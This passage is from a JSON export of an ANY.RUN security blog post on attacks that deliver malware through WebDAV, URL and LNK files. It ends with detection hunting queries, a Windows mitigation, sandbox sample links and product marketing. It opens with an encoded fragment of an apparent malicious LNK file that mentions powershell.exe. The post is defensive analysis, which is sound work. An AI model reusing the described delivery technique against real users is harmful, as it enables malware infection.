DQANgAzADUALQAzADkAOAA3ADMAMwA4ADIANQAwAC0ANQAwADAAAAAAAAAAtQAAADFTUFMw8SW370caEKXxAmCMnuusMQAAAAoAAAAAHwAAAA8AAABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAAAAAABUAAAAPAAAAAEAAAAAAQflm4kPXARUAAAAMAAAAABUAAAAA4AYAAAAAACkAAAAEAAAAAB8AAAAMAAAAQQBwAHAAbABpAGMAYQB0AGkAbwBuAAAAFQAAAA4AAAAAQAAAAPh8PWbiQ9cBAAAAAKEAAAAxU1BTpmpjKD2V0hG11gDAT9kY0IUAAAAeAAAAAB8AAAA6A\" target=\"_blank\" rel=\"noreferrer noopener\">Cyberchef<\/a>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>So, in summary, we&#8217;ve written YARA, Suricata, and SIGMA hunting rules to detect this type of WebDAV exploitation attack.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">How to block URL execution&nbsp;<\/h2>\n\n\n\n<p>While we&#8217;ve learned how to detect these attacks, it&#8217;s also important as defenders to prevent them. One mitigation is to block the execution of URL files in Windows settings:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1800\" height=\"1153\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1024x656.jpg\" alt=\"\" class=\"wp-image-7577\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1024x656.jpg 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-300x192.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-768x492.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1536x984.jpg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-370x237.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-270x173.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-740x474.jpg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6.jpg 1800w\" sizes=\"(max-width: 1800px) 100vw, 1800px\" \/><\/figure><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"737\" height=\"338\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/11-1.png\" alt=\"\" class=\"wp-image-7578\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/11-1.png 737w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/11-1-300x138.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/11-1-370x170.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/11-1-270x124.png 270w\" sizes=\"(max-width: 737px) 100vw, 737px\" \/><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Materials to use for further research&nbsp;<\/h2>\n\n\n\n<p>Searching for and studying this attack vector can be done using our threat intelligence service and the detected artifacts. For example, using a regex on the command line:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>CommandLine:\"\\\\\\\\*@*\\\\\" <\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"580\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/12-1024x580.png\" alt=\"\" class=\"wp-image-7579\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/12-1024x580.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/12-300x170.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/12-768x435.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/12-1536x870.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/12-370x209.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/12-270x153.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/12-740x419.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/12.png 1549w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div>\n\n\n<p>The URL filter can also find relevant results:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>URL:\"*.lnk$\" <\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"735\" height=\"840\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7.jpg\" alt=\"\" class=\"wp-image-7580\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7.jpg 735w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7-263x300.jpg 263w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7-370x423.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7-270x309.jpg 270w\" sizes=\"(max-width: 735px) 100vw, 735px\" \/><\/figure><\/div>\n\n\n<p>Finally, you can search for triggered Suricata rules:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SuricataMessage:\"ET INFO LNK File Downloaded via HTTP\" <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"472\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/13-1-1024x472.png\" alt=\"\" class=\"wp-image-7581\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/13-1-1024x472.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/13-1-300x138.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/13-1-768x354.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/13-1-1536x707.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/13-1-370x170.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/13-1-270x124.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/13-1-740x341.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/13-1.png 1544w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>We&#8217;ve prepared some example results for further analysis:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/app.any.run\/tasks\/82de8ef0-0433-4031-be8f-9ee12275af2e\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=webdav_attack_analysis&amp;utm_content=linktoservice&amp;utm_term=080424\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/82de8ef0-0433-4031-be8f-9ee12275af2e<\/a>&nbsp;<\/li>\n\n\n\n<li><a href=\"https:\/\/app.any.run\/tasks\/859664f2-cc2c-458f-9069-810376b85621\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=webdav_attack_analysis&amp;utm_content=linktoservice&amp;utm_term=080424\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/859664f2-cc2c-458f-9069-810376b85621<\/a>&nbsp;<\/li>\n\n\n\n<li><a href=\"https:\/\/app.any.run\/tasks\/919b7f94-7507-4b9d-8d20-5b88d1fe6fa2\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=webdav_attack_analysis&amp;utm_content=linktoservice&amp;utm_term=080424\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/919b7f94-7507-4b9d-8d20-5b88d1fe6fa2<\/a>&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusions&nbsp;<\/h2>\n\n\n\n<p>In this article, we looked at client-side exploitation techniques abusing WebDAV and LNK files to deliver malware. We wrote rules to detect malicious URL\/LNK files, command line indicators, and network connections to WebDAV servers. Preventing LNK\/URL execution through Windows settings is also an effective control.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN&nbsp;<\/h2>\n\n\n\n<p>ANY.RUN\u2019s flagship product is an interactive malware sandbox that helps security teams efficiently analyze malware.&nbsp;<\/p>\n\n\n\n<p>Every day, a community of 400,000 analysts and 3000 corporate clients use our cloud-based platform to analyze Windows and Linux threats.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nIntegrate <span class=\"highlight\">ANY.RUN Threat Intelligence<\/span> in your organization&nbsp;\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/intelligence.any.run\/plans\/\" rel=\"noopener\" target=\"_blank\">\nContact Sales\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p><strong>Key advantages of ANY.RUN for businesses:<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Interactive analysis: <\/strong>Analysts can \u201cplay with the sample\u201d in a VM to learn more about its behavior.&nbsp;<\/li>\n\n\n\n<li><strong>Fast and easy configuration. <\/strong>Launch VMs with different configurations in a matter of seconds.&nbsp;<\/li>\n\n\n\n<li><strong>Fast detection: <\/strong>Detects malware within roughly 40 seconds of uploading a file.&nbsp;<\/li>\n\n\n\n<li><strong>Cloud-based solution<\/strong> eliminates setup and maintenance costs.&nbsp;<\/li>\n\n\n\n<li><strong>Intuitive interface<\/strong>: Enables even junior SOC analysts to conduct malware analysis.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Learn how ANY.RUN can benefit you or your security team. Schedule a free demo with one of our sales representatives, and we&#8217;ll walk you through real-world examples.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/calendly.com\/d\/3nd-rzd-xvx\/any-run-demo-blog\/\" target=\"_blank\" rel=\"noreferrer noopener\">Schedule a demo \u2192<\/a>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A look at the offensive and defensive angles.&nbsp; What is WebDAV?\u00a0 WebDAV, short for Web Distributed Authoring and Versioning, is an extension of the Hypertext Transfer Protocol (HTTP). What is WebDAV used for WebDAV is used for managing files on web servers. It allows users to create, edit, move, and delete files directly on a [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":7583,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,34,40],"class_list":["post-7560","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Client-Side Exploitation: WebDAV+URL+LNK Abuse<\/title>\n<meta name=\"description\" content=\"Learn how attackers can place malicious payloads on remote servers to download and execute them on the victim&#039;s PC using WebDAV.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"khr0x and Electron\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/\"},\"author\":{\"name\":\"khr0x and Electron\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads\",\"datePublished\":\"2024-04-08T09:50:07+00:00\",\"dateModified\":\"2025-01-31T05:41:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/\"},\"wordCount\":289,\"commentCount\":2,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/\",\"name\":\"Client-Side Exploitation: WebDAV+URL+LNK Abuse\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2024-04-08T09:50:07+00:00\",\"dateModified\":\"2025-01-31T05:41:30+00:00\",\"description\":\"Learn how attackers can place malicious payloads on remote servers to download and execute them on the victim's PC using WebDAV.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},[{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"khr0x\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/03\/ghIpC7Xf4_I-1-150x150.jpg\",\"caption\":\"khr0x\"}},{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"Electron\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/05\/6394744-150x150.png\",\"caption\":\"Electron\"}}]]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Client-Side Exploitation: WebDAV+URL+LNK Abuse","description":"Learn how attackers can place malicious payloads on remote servers to download and execute them on the victim's PC using WebDAV.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/","twitter_misc":{"Written by":"khr0x and Electron","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/"},"author":{"name":"khr0x and Electron","@id":"https:\/\/any.run\/"},"headline":"Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads","datePublished":"2024-04-08T09:50:07+00:00","dateModified":"2025-01-31T05:41:30+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/"},"wordCount":289,"commentCount":2,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/","url":"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/","name":"Client-Side Exploitation: WebDAV+URL+LNK Abuse","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2024-04-08T09:50:07+00:00","dateModified":"2025-01-31T05:41:30+00:00","description":"Learn how attackers can place malicious payloads on remote servers to download and execute them on the victim's PC using WebDAV.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},[{"@type":["Person"],"@id":"https:\/\/any.run\/","name":"khr0x","image":{"@type":"ImageObject","@id":"https:\/\/any.run\/","inLanguage":"en_US","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/03\/ghIpC7Xf4_I-1-150x150.jpg","caption":"khr0x"}},{"@type":["Person"],"@id":"https:\/\/any.run\/","name":"Electron","image":{"@type":"ImageObject","@id":"https:\/\/any.run\/","inLanguage":"en_US","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/05\/6394744-150x150.png","caption":"Electron"}}]]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/7560"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=7560"}],"version-history":[{"count":12,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/7560\/revisions"}],"predecessor-version":[{"id":11359,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/7560\/revisions\/11359"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/7583"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=7560"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=7560"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=7560"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}